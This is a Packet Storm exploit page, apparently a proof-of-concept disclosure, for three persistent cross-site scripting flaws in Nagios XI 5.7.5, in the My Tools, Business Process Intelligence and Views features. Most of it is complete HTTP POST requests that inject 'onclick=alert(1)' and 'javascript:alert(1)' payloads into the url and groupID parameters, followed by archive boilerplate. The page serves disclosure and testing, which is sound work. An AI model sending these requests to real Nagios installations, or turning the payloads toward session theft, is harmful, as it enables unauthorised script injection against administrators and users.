what you don't know can hurt you

Nagios XI 5.7.5 Cross Site Scripting

Nagios XI 5.7.5 Cross Site Scripting
Posted Jan 21, 2021
Authored by Matthew Aberegg

Nagios XI version 5.7.5 suffers from multiple persistent cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | 1ccaf139e2bb7184ac85d9e6f90a280b

Nagios XI 5.7.5 Cross Site Scripting

Change Mirror Download
# Exploit Title: Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting
# Date: 1-20-2021
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.5
# Tested on: Ubuntu 18.04


# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI.
# Vulnerable Parameter : url


# POC
# Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.

POST /nagiosxi/tools/mytools.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://TARGET
Connection: close
Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1
Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas
Upgrade-Insecure-Requests: 1

nsp=a2569a2507c7c69600769ca7388614b4264ab9479c560ac62bbc5f9fd76c2524&update=1&id=-1&name=XSS+Test&url=%27+onclick%3D%27alert%281%29&updateButton=


############################################################################################################

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in "Business Process Intelligence" functionality of Nagios XI.
# Vulnerable Parameter : groupID


# POC
# Exploit Details : The following request will create a BPI group with an XSS payload. Click on the Group ID for the malicious BPI group to trigger the payload.

POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Origin: http://TARGET
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add
Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
Upgrade-Insecure-Requests: 1

groupID=%27onclick%3Dalert%281%29%2F%2F&groupType=default&groupTitle=TEST&groupDesc=&groupInfoUrl=&groupPrimary=1&groupWarn=90&groupCrit=80&groupDisplay=2&addSubmitted=true


############################################################################################################

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in "Views" functionality of Nagios XI.
# Vulnerable Parameter : url


# POC
# Exploit Details : The following request will create a view with an XSS payload. Click on the malicious view to trigger the payload.

POST /nagiosxi/ajaxhelper.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 147
Origin: http://TARGET
Connection: close
Referer: http://TARGET/nagiosxi/account/
Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td

cmd=addview&url=javascript:alert(1)&title=TESTVIEW&submitButton=&nsp=c97136052a4b8d7d535c7d4a7a32389a5882c65cb34f2c36b849f72af52b2056

Login or Register to add favorites

File Archive:

March 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    19 Files
  • 2
    Mar 2nd
    15 Files
  • 3
    Mar 3rd
    30 Files
  • 4
    Mar 4th
    13 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close